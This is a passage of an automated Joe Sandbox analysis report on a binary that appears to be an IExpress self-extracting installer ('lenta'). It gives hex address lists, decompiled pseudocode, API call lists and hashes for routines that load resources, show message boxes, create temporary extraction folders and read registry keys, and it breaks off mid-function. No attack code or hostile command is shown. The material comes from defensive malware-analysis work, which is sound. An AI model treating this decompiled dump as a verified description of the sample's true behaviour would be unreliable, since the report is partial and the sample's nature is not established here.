                                                                                                                                                                                                                                              0x0097584b
                                                                                                                                                                                                                                              0x00975851
                                                                                                                                                                                                                                              0x00975855
                                                                                                                                                                                                                                              0x0097585a
                                                                                                                                                                                                                                              0x0097585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097585e
                                                                                                                                                                                                                                              0x00975811
                                                                                                                                                                                                                                              0x00975817
                                                                                                                                                                                                                                              0x00975819
                                                                                                                                                                                                                                              0x0097581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097581f
                                                                                                                                                                                                                                              0x00975791
                                                                                                                                                                                                                                              0x00975797
                                                                                                                                                                                                                                              0x0097579c
                                                                                                                                                                                                                                              0x0097579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009757a0
                                                                                                                                                                                                                                              0x009757a9
                                                                                                                                                                                                                                              0x009757ae
                                                                                                                                                                                                                                              0x009757b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009757b0
                                                                                                                                                                                                                                              0x0097579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975769
                                                                                                                                                                                                                                              0x00975762
                                                                                                                                                                                                                                              0x00975753
                                                                                                                                                                                                                                              0x0097574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975864
                                                                                                                                                                                                                                              0x00975717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756c3
                                                                                                                                                                                                                                              0x009756c5
                                                                                                                                                                                                                                              0x009756c9
                                                                                                                                                                                                                                              0x009756ce
                                                                                                                                                                                                                                              0x009756d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756d6
                                                                                                                                                                                                                                              0x009756d6
                                                                                                                                                                                                                                              0x009756d8
                                                                                                                                                                                                                                              0x009756dd
                                                                                                                                                                                                                                              0x009756df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756e1
                                                                                                                                                                                                                                              0x009756e2
                                                                                                                                                                                                                                              0x009756e4
                                                                                                                                                                                                                                              0x009756e6
                                                                                                                                                                                                                                              0x009756eb
                                                                                                                                                                                                                                              0x009756ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x009756f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097586c
                                                                                                                                                                                                                                              0x00975878
                                                                                                                                                                                                                                              0x0097587e
                                                                                                                                                                                                                                              0x00975882
                                                                                                                                                                                                                                              0x00975883
                                                                                                                                                                                                                                              0x00975889
                                                                                                                                                                                                                                              0x0097588e
                                                                                                                                                                                                                                              0x0097588e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975896
                                                                                                                                                                                                                                              0x009756ed
                                                                                                                                                                                                                                              0x009756df
                                                                                                                                                                                                                                              0x009756d0
                                                                                                                                                                                                                                              0x009756c1
                                                                                                                                                                                                                                              0x009756a8
                                                                                                                                                                                                                                              0x0097565b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009755CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00975638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0097564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00975620
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 009756B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0097571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00975737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009757CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009757EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00975802
                                                                                                                                                                                                                                                • Part of subcall function 00972630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00972654
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00975830
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                                • Part of subcall function 00976517: LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                                • Part of subcall function 00976517: DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00975878
                                                                                                                                                                                                                                                • Part of subcall function 0097597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009759A8
                                                                                                                                                                                                                                                • Part of subcall function 0097597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009759AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-2740620654
                                                                                                                                                                                                                                              • Opcode ID: 1e30abeca76fae0320af00ca737966c7dc71e3c0c0b97220180adbd284869b8a
                                                                                                                                                                                                                                              • Instruction ID: 3849fc9cb4ba2f5c38a821cdd52872ab0e1de5e7daa6cd170bf74fbcb0a81838
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e30abeca76fae0320af00ca737966c7dc71e3c0c0b97220180adbd284869b8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30812B73A08A049BDBA4AB748C45BEE73ADDBE1300F458466F58ED2191EFF48DC18A51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 406 9744b9-9744f8 407 9744fe-974525 LoadStringA 406->407 408 974679-97467b 406->408 410 974527-97452e call 97681f 407->410 411 974562-974568 407->411 409 97467c-97468c call 976ce0 408->409 420 974530-97453d call 9767c9 410->420 421 97453f 410->421 413 97456b-974570 411->413 413->413 416 974572-97457c 413->416 418 97457e-974580 416->418 419 9745c9-9745cb 416->419 425 974583-974588 418->425 422 974607-974617 LocalAlloc 419->422 423 9745cd-9745cf 419->423 420->421 424 974544-974554 MessageBoxA 420->424 421->424 429 97455a-97455d 422->429 430 97461d-974628 call 971680 422->430 428 9745d2-9745d7 423->428 424->429 425->425 431 97458a-97458c 425->431 428->428 432 9745d9-9745ed LocalAlloc 428->432 429->409 436 97462d-97463d MessageBeep call 97681f 430->436 434 97458f-974594 431->434 432->429 435 9745f3-974605 call 97171e 432->435 434->434 437 974596-9745ad LocalAlloc 434->437 435->436 444 97463f-97464c call 9767c9 436->444 445 97464e 436->445 437->429 440 9745af-9745c7 call 97171e 437->440 440->436 444->445 447 974653-974677 MessageBoxA LocalFree 444->447 445->447 447->409
                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E009744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0x978a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x979a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E00971680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E0097171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                                                                                                              							} while (_t59 != 0);
                                                                                                                                                                                                                                              							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                              							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                              							_t80 = _t44;
                                                                                                                                                                                                                                              							if(_t80 == 0) {
                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_push(_v580);
                                                                                                                                                                                                                                              								E0097171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                                                              								MessageBeep(_a12);
                                                                                                                                                                                                                                              								if(E0097681F(_t67) == 0) {
                                                                                                                                                                                                                                              									L25:
                                                                                                                                                                                                                                              									_t49 = 0x10000;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t54 = E009767C9(_t74, _t74);
                                                                                                                                                                                                                                              									_t49 = 0x190000;
                                                                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                              								_t83 = _t52;
                                                                                                                                                                                                                                              								LocalFree(_t80);
                                                                                                                                                                                                                                              								_t39 = _t52;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(E0097681F(_t67) == 0) {
                                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                                              							_t64 = 0x10010;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t66 = E009767C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00976CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}


APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
• MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 009745A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 009745E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0097460D
• MessageBeep.USER32(00000000), ref: 00974630
• MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00974666
• LocalFree.KERNEL32(00000000), ref: 0097466F
  • Part of subcall function 0097681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0097686E
  • Part of subcall function 0097681F: GetSystemMetrics.USER32(0000004A), ref: 009768A7
  • Part of subcall function 0097681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009768CC
  • Part of subcall function 0097681F: RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,?,0000000C), ref: 009768F4
  • Part of subcall function 0097681F: RegCloseKey.ADVAPI32(?), ref: 00976902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: 7bc473780c9cc964c844bbf9ccf81ed1872b22e60d72a3cc9b3b11bdcd40c132
                                                                                                                                                                                                                                              • Instruction ID: 6773cbdfebc5463287d3b77af544879a30c5fbb7f6729f73aada894e476aa2ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bc473780c9cc964c844bbf9ccf81ed1872b22e60d72a3cc9b3b11bdcd40c132
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13510473904215ABDB219F28CC48BAABB6DEF85300F148194FD1DA7242DB31DE45DBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E009753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E0097171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E00971680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E0097658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E00976CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0x978a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009753FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-775753704
                                                                                                                                                                                                                                              • Opcode ID: d36395f2e3faf5e60063e5eff7b2bee59e81d6634ad4711526e91db210768fb3
                                                                                                                                                                                                                                              • Instruction ID: 8f72d230d10bdc06b23c305b5519f62a6a1e181cc7d7fe7834efc6772a3cd88d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d36395f2e3faf5e60063e5eff7b2bee59e81d6634ad4711526e91db210768fb3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C11277330850467E7209B369C49FEF366DEFC2711F008425F64ED21A0DEB48D8296A5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 563 97256d-97257d 564 972583-972589 563->564 565 972622-972627 call 9724e0 563->565 566 97258b 564->566 567 9725e8-972607 RegOpenKeyExA 564->567 570 972629-97262f 565->570 569 972591-972595 566->569 566->570 571 9725e3-9725e6 567->571 572 972609-972620 RegQueryInfoKeyA 567->572 569->570 574 97259b-9725ba RegOpenKeyExA 569->574 571->570 575 9725d1-9725dd RegCloseKey 572->575 574->571 576 9725bc-9725cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E0097256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E009724E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
